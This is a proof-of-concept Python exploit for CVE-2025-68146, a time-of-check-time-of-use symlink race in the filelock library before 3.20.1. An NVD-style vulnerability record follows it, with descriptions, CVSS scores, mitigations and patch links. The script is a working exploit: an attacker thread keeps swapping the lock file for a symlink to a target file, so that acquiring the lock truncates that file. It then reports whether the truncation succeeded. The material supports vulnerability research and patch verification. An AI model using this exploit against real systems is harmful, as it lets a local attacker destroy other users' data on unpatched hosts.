CVE-2025-68146

#!/usr/bin/env python3 """ CVE-2025-68146 PoC: filelock TOCTOU Race Condition leading to File Truncation Affected: filelock < 3.20.1 Author: Security Researcher Note: This PoC is for educational and authorized testing purposes only. """ import os import time import threading import tempfile from filelock import UnixFileLock TARGET_FILE = "/tmp/victim_target.txt" LOCK_FILE = "/tmp/race_lock.lock" def setup(): """Create the victim target file with some content.""" with open(TARGET_FILE, 'w') as f: f.write("IMPORTANT DATA - DO NOT DELETE\n" * 100) print(f"[+] Created target file: {TARGET_FILE}") print(f" Initial size: {os.path.getsize(TARGET_FILE)} bytes") def attacker_symlink_race(): """ Attacker thread: Continuously creates symlink from LOCK_FILE to TARGET_FILE during the TOCTOU window between os.path.exists() check and os.open() call. """ for _ in range(50): # Retry to hit the race window try: if os.path.exists(LOCK_FILE): os.remove(LOCK_FILE) # Create symlink pointing to the victim file os.symlink(TARGET_FILE, LOCK_FILE) except FileExistsError: os.remove(LOCK_FILE) os.symlink(TARGET_FILE, LOCK_FILE) except FileNotFoundError: pass time.sleep(0.0001) # Fast retry to hit the race condition def victim_lock_operation(): """ Victim operation: filelock tries to acquire a lock. The TOCTOU gap allows symlink to be inserted between check and open. """ try: lock = UnixFileLock(LOCK_FILE, timeout=1) with lock: print("[*] Lock acquired successfully") except Exception as e: print(f"[!] Lock operation failed: {e}") def verify_result(): """Check if the target file was truncated.""" size = os.path.getsize(TARGET_FILE) print(f"\n[+] Target file final size: {size} bytes") if size == 0: print("[!!!] VULNERABLE: Target file was TRUNCATED to 0 bytes!") print("[!!!] TOCTOU race condition confirmed.") return True else: print("[-] Target file not truncated (race not won this time).") print("[-] Try running multiple iterations.") return False def cleanup(): """Clean up created files.""" for f in [TARGET_FILE, LOCK_FILE]: if os.path.exists(f) or os.path.islink(f): os.remove(f) def main(): print("=" * 60) print("CVE-2025-68146 - filelock TOCTOU Race Condition PoC") print("=" * 60) cleanup() setup() # Run the race multiple times for attempt in range(5): print(f"\n--- Attempt {attempt + 1} ---") cleanup() setup() # Start attacker thread attacker_thread = threading.Thread(target=attacker_symlink_race) attacker_thread.daemon = True attacker_thread.start() # Small delay to let attacker set up symlinks time.sleep(0.001) # Trigger victim lock operation victim_lock_operation() attacker_thread.join(timeout=0.1) if verify_result(): print("\n[!] Exploit successful!") break cleanup() print("\n[*] Test completed.") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-68146", "sourceIdentifier": "[email protected]", "published": "2025-12-16T19:15:59.957", "lastModified": "2026-03-05T20:04:36.237", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "filelock is a platform-independent file lock for Python. In versions prior to 3.20.1, a Time-of-Check-Time-of-Use (TOCTOU) race condition allows local attackers to corrupt or truncate arbitrary user files through symlink attacks. The vulnerability exists in both Unix and Windows lock file creation where filelock checks if a file exists before opening it with O_TRUNC. An attacker can create a symlink pointing to a victim file in the time gap between the check and open, causing os.open() to follow the symlink and truncate the target file. All users of filelock on Unix, Linux, macOS, and Windows systems are impacted. The vulnerability cascades to dependent libraries. The attack requires local filesystem access and ability to create symlinks (standard user permissions on Unix; Developer Mode on Windows 10+). Exploitation succeeds within 1-3 attempts when lock file paths are predictable. The issue is fixed in version 3.20.1. If immediate upgrade is not possible, use SoftFileLock instead of UnixFileLock/WindowsFileLock (note: different locking semantics, may not be suitable for all use cases); ensure lock file directories have restrictive permissions (chmod 0700) to prevent untrusted users from creating symlinks; and/or monitor lock file directories for suspicious symlinks before running trusted applications. These workarounds provide only partial mitigation. The race condition remains exploitable. Upgrading to version 3.20.1 is strongly recommended."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-59"}, {"lang": "en", "value": "CWE-362"}, {"lang": "en", "value": "CWE-367"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-367"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tox-dev:filelock:*:*:*:*:*:python:*:*", "versionEndExcluding": "3.20.1", "matchCriteriaId": "09A9ECDC-0BD1-4B42-B7ED-8EF3EA9E91AB"}]}]}], "references": [{"url": "https://github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/tox-dev/filelock/pull/461", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/tox-dev/filelock/releases/tag/3.20.1", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}